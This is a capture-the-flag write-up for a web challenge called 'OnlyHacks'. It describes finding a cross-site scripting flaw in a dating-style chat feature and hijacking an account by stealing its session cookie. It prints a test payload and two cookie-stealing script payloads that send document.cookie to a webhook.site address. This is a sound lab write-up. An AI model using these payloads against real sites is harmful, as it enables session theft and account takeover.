Tag: Writeup

  • Titanic

    Coming Soon!

  • OnlyHacks

    Summary

    This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.

    Write-up

    This image has an empty alt attribute; its file name is image.png

    The login page appears resistant to basic SQL injection and authentication bypass attempts.

    We will move on with the Sign Up function.

    This image has an empty alt attribute; its file name is image-1.png

    The signup process, however, requires a profile picture upload, which presents a potential vulnerability.

    Moving on the the Dashboard.

    This image has an empty alt attribute; its file name is image-2.png

    Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in dashboard.js. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.

    This image has an empty alt attribute; its file name is image-3-1024x538.png
    This image has an empty alt attribute; its file name is image-4.png

    I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.

    Let try some basic XXS with:

    <script>alert(1)</script>

    This image has an empty alt attribute; its file name is image-5-1024x536.png

    We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.

    <script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>

    Or

    <script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>

    This image has an empty alt attribute; its file name is image-6.png

    Replace the cookie we got and refresh the page to get the flag.

    This image has an empty alt attribute; its file name is image-7.png